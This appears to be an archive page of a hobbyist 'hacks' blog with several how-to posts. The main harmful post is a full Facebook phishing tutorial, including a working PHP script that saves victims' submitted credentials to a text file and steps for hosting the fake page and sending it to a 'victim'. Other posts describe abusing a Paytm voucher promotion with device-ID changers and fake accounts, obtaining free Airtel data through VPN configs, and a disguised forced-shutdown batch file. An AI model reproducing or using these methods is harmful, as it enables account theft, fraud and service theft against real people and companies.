Categories

Showing posts with label Hacks. Show all posts
Showing posts with label Hacks. Show all posts

Wednesday, 4 February 2015

Paytm hack

Paytm Coupon hack: Get Unlimited Rs. 50 Free Recharge Voucher

We got many requests for free recharges.Today i m here with some alternate method to get unlimited reacharges for any operator.Times of India is promoting there Mobile Apps by giving free Rs. 50 for everyone who download / install and login through Facebook to Times Of India app. They are giving away Free Rs. 50 Paytm Recharge Voucher. Below We have shared how to get unlimited recharge vouchers of paytm by using Youwave emulator :

Steps To Get Free Rs. 50 Voucher:

  • Tick mark on I agree to the offer's Terms & Conditions.
  • Then click on LOGIN WITH FACEBOOK.
  • After successful login wait for few minutes you will get another popup with recharge voucher.

Proof:

    How To Get Unlimited Vouchers:

    For Bluestack Users:
    • Install Times Of India App on Bluestack.
    • Use it for the first time.
    • Now install Device Id Changer.
    • Clear data of Times Of India App From Settings -> App.
    • Then open Device ID changer app and change device id.
    • Now you can again get free Rs. 50 paytm voucher from other Facebook Account.
    For Mobile Users:
    • You need to have a rooted phone.
    • Rest other steps is same as Bluestack.
    Coming soon with video tutorial :)

    If you want to use it on Youwave then you can simply reset youwave and then try again with new fb account. Make sure to install Google Framework everytime.

    Terms & Conditions:

    • This code will expire on 31/03/2016
    • You can redeem this coupon only on the Paytm app.
    Feel free to like us ,comment and share.If u want more offers we need too many viewrs for our site so plz promote us and like us on Facebook. Thank you. hope u liked our post.




    Free Airtel 3g internet

    Hello Friends, 
    Hope you enjoying well, Today we going to give you a new trick of AirTel 3G TCP vpn configs for free net/Gprs in your mobile and computer.

    There is so many days left we does not post any airtel trick so we decided to post new again.Because you know airtel is our favorite network for free net.
                        


    So let's start...

    Requirement For this AirTel 3G Tcp Vpn Trick 

    1. AirTel 3G/2G Enabled Sim card.
    2. Nmdvpn Client (download from here).
    3. PC or MOBILE.
    If you have all basic requirements which above listed,then you are ready to go for next steps.And i hope you have every thing.
    Now most important thing ,Now download config file from below link First.

    ** Download AirTel Tcp Config File 4m Here*** 

    Now i Hope you downloaded above file form datafile host link.Now  you are ready to move next step.Now choose you pc user or mobile user ,means on which medium you are going to use it and choose those medium and follow the steps.

    For PC Users:

    1.Connect your system with modem/Mobile with APN airtelgprs.com
    2.Download The Attachment of Airtel Tcp 3G Vpn Trick (if downloaded all ready then go to next step).
    2.Install Nmdvpn and Put configs(or exact) Here (C:\Program Files\NMDVPN\config) in your system location
    3.Windows 7 and Windows 8 Users RUN NMD VPN as the Administrator.
    4.Just Connect given server and Enjoy.


    And if you have not a PC/Computer  Then you can also enjoy free net in your android mobiles.

    For Mobile users:  

    Android mobile use can also use these airtel tcp 3G Trick configs  with their android devices just you need to follow these simple steps :

    1. Download and extract config in SD card.
    2. Go to Google Play Store Search for open vpn for android. Or Click Here
    3. Install Open Vpn in you android device.
    4. Add airtel tcp 3G Vpn Config to open Vpn folder.
    5. when it ask user name password (see earticleblog txt file in attachment) enter it.
    6. Run and Enjoy  :) 
    Hope you follow all process and enjoyed this trick.
    Note- Do't try at higher balnce your balnce got deducted.Use it at 0 rs balnce.
    And for avoiding sim blockege we recommend you use any small data pack (not necessary )

    Feel free to like,comment and share.Like us on facebook.We are comming with many more tricks soon..stay tuned.

    Facebook hacking with phishing

    I got many request for facebook hacking tricks.We all want to hack our friend Facebook account,and want to read all his personal things.

    Today i m here with, how to hack a facebook account with a phishing page.
                                                     

    phishing:


    Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

    today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

    FACEBOOK PHISHING....


    facebook hack
                                                                             


    steps to create a phishing page:

    1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.




                                              
    2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
    3.Now open the notepad and press CTRL+F,and type ACTION.


    facebook phishing script
                                                      

                                               
    4.You will have to find a text which looks like ..

                                           action="https://www.facebook.com/login.php?login_attempt=1"

    5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                     action="post.php"

    6.Now save it on your desktop with the name index.htm,not index.html,remember.

    7.Now your phishing page is ready.it will look like a pic given below .


    hacking script
    index

                                                       
    8.Open a new notepad and save the given data with the name post.php.

    <?php
    header ('Location:http://www.facebook.com/');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 

    9.You have two files now one is index.htm and another is post.php,remember file extension is important.

    10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

    11.I prefer u to use 000webhost because it will be easy to use.
                               

    hosting website
                                                  

    12.You have to make a account in that ,after that it looks like a picture given below.



    facebook script hosting website
                                                                              
    13.Now go control pannel,then on file manager.

    14.After that a new window will pop up.Now go to public_html.


                                               
                                            

    15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .



                                            
    16.Now the last step click on view of index.htm it will look same as facebook page.



    this is your Facebook phishing page
                                             

    17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

    18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                    


                                            

    19.Click on view now u will have your friend's password and email id.


                                               

    20.This is a simple trick to hack any Facebook password account by phishing page.

    21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
          in to the description of that video u will find a prepared module of phishing pages,download  
          it and enjoy.



    note:

    phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
    Not only Facebook u can make any phishing page of any website by following these steps....
    u can hack Gmail,Yahoo,Orkut,Twitter and many more.....






                                                   

    Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....

                                                               thank you....

    Saturday, 1 November 2014

    How To Create Run Commands in Windows

    There is no doubt that Microsoft Windows is the most widely used operating system in all parts of the world. Apart from being simple to use, it is quite rich in features as well, which makes our lives quite easy.
    The Run command available on Windows operating system is one such power packed feature that lets you to open a document or an application instantly with the help of just 1 command. So, rather than clicking several icons or using multiple commands, you can use the Run command to open any program or document instantly. For that you will need to Create Run Commands for any software of your Choice which you use Frequently.
    Create Run CommandsBut, do you know how to Create Run Commands of your Own? Well, it is really easy, which involves just few steps. Through this article, I will help you understand how to access your favorite applications by creating custom Run commands.

    Open Run Command:

    Before I show you how to create your own Run commands, let’s take a quick look on how to open Run Command. First of all, you need to open the Run window by just pressing the Windows Key along with the R key, i.e. Windows + R. Now, you have to type the name of the program that you desire to open up or execute. Unfortunately, not all programs can be accessed through this method. So, let me show you how to create Run commands that do not come as inbuilt commands.

    Steps to Create run commands of your own


    Step 1. The first step is to select the software or application for which you want to make custom Run command. For example, let us consider Google Chrome as the example here. Remember, you can choose any application other than which is already there in the Run command.

    Step 2. In the second step, right click on the desktop of your computer system and make a new shortcut.
    Right click > New > Shortcut

    Step 3. As you select the Shortcut option in the 2nd Step, it will open up a dialog box. And, the dialog box will ask you path of the application or software for which you want to create the Run command.

    Step 4. Now, you need to browse through the files and choose the one that shows “chrome.exe”. Well, it is quite obvious that all the executable files can be found in the C drive (or wherever the Operating System has been installed), inside the folder “Program Files”. For example, “C:\Program Files\Google Chrome\chrome.exe

    Step 5. Once you are done with Step number 4, just click on “Next” button and simply provide a relative name to that shortcut. Remember, the same name will be used later in the Run command.
    For example, “GC” for Google Chrome

    Step 6. Now, click on the “Finish” button. Once it is done, an icon related to that application or software will show up on your computer’s screen. It means that the process of creating shortcut has been done successfully.

    Step 7. In this step, just cut and paste that recently made shortcut icon into your computer’s root drive, in its Windows folder.
    For example, C:\ Windows , Make sure you are the administrator of the computer or have its password.

    Step 8. Now, you are done with the set up and can run the application through Run Command. Just go to Run and enter the keyword “GC”, and Google Chrome will begin executing.
    So this was a Short but Usefull Tutorial to Create Run Commands for any software in windows,I Hope this Post will Easeup your Work, Stay Tuned and Subscribe to this Blog to Recieve Updates Everytime a New article is posted. Subscribe Box..

    Friday, 17 October 2014

    How To Change Your IP Address



    My IP address
    Can I change my IP address? is probably the most commonly asked question, IP address is a numerical way of identifying your computer. Every computer has its own unique IP. If you get your IP blocked somewhere and you don't like it then this guide is for you, Before trying this method, turning off or unplug your modem/router for few minutes.

    Steps:


    1. Type "CMD" into the run box from start menu and hit OK


    2. Type "ipconfig" into the command prompt (This will show you info about your IP address)

    3. Type "ipconfig /release" and hit "Enter (This will remove your currnt IP)

    How to change my IP address

    4. Type "ipconfig /renew" and you will be presented with a new IP address.

    5. Type "exit" and leave the prompt.

    If this does not answer of your question, please leave your comment.

    Create Some Fake Computer Viruses



    make some fake computer viruses
    Today I am sharing another interesting article about "How To Make Fake Funny  Computer Virus". In this tutorial I teach you how to make a harmless and fake virus, Basically what it does is just log off and then "Shutdownyour computer.
    Disclaimer - Everything here is for informational purposes only.

    1. Fake error message

    Step-1 Make a new text document with notepad, type msg * YOUR MESSAGE, image refer below:
    Type your fake massage

    Step- 2 Now save as Play me.bat As always, make sure that you select All files instead of Text Document.


    Here's how it will look like once it is launched:


    Fake error message

    2. Forced Shutdown

    Step-1 Put the following into your Notpad:

    @echo off
    shutdown -s -f -t 60 -c "YOUR MESSAGE HERE"

    (Replace 60 with the length of the countdown you want)

    Step- 2 Now save as play me.bat

    Here's how it will look like:

    Fake forced shutdown

    To stop it, open Run from the start menu and type shutdown-a. Enjoy
    Feel free to share,comment and like us on facebook.